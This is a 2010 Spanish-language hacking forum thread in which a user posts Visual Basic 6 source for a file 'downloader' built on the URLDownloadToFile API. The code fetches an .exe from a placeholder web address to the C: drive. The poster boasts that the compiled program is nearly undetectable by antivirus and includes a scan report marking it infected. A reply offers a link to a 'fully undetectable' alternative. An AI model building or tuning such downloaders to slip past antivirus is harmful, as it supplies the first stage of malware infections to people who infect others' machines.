elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  [Source] Downloader VB 6.0
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Source] Downloader VB 6.0  (Leído 2,831 veces)
Elemental Code


Desconectado Desconectado

Mensajes: 622


Im beyond the system


Ver Perfil
[Source] Downloader VB 6.0
« en: 17 Abril 2010, 00:16 am »

Obviamente el codigo no es mio  :-X
Lei por muchos lados que esto ya era detectado por los antivirus.
pero yo hice un programa con este codigo y Casi indetectable.
Solamente lo detecta el Fprot6

Lo meten al form y agregan un boton "cmdDownload" para que baje o sino lo ponen como quiera

Código
  1. 'Funcion para bajar archivo
  2. Private Declare Function URLDownloadToFile Lib "urlmon" _
  3.    Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
  4.    ByVal szURL As String, ByVal szFileName As String, _
  5.    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
  6.  
  7. Private Sub cmdDownload_Click()
  8.    ' Bajar el Archivo
  9.    URLDownloadToFile 0, _
  10.        "www.tusitioweb.com/tuarchivo.exe", _
  11.        "C:\Tuarchivo.exe", 0, 0
  12. End Sub
  13.  

File Info

Report date: 2010-04-16 23:52:42 (GMT 1)
File name: Mini_Downloader.exe
File size: 16384 bytes
MD5 Hash: e6377d5a23422abc8984eda961e2c1c4
SHA1 Hash: 95fdd84d8dca03d65254b8268691af52efbe36b7
Detection rate: 1 on 20 (5%)
Status: INFECTED
Ver reporte completo

SOURCE:
Descargar Source

PD: no he podido encontrar como adjuntar archivos al post



En línea

I CODE FOR $$$
Programo por $$$
Hago tareas, trabajos para la facultad, lo que sea en VB6.0

Mis programas
BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
Re: [Source] Downloader VB 6.0
« Respuesta #1 en: 17 Abril 2010, 06:38 am »

Código
  1. Private Declare Function URLDownloadToFile Lib "urlmon" _
  2.    Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
  3.    ByVal szURL As String, ByVal szFileName As String, _
  4.    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
  5.  

Es solo una API, ya estan las Web's llenas de esa API...!¡.

Mi aqui una Alternativa 100% FUD (Aquí)

Dulces Infierno Lunar!¡.


En línea

The Dark Shadow is my passion.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[SOURCE] mrtzcmp3 Downloader « 1 2 »
.NET (C#, VB.NET, ASP)
z3nth10n 13 10,779 Último mensaje 8 Febrero 2014, 21:02 pm
por Eleкtro
[Source Code] autorun.inf.wim - Stealer&Downloader / No Requiere Privilegios / Propagacion USB
Análisis y Diseño de Malware
**Aincrad** 0 7,639 Último mensaje 10 Septiembre 2021, 02:18 am
por **Aincrad**
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines